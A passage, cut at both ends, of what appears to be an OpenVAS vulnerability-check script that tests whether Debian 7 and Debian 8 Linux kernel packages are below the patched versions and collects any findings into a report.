res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 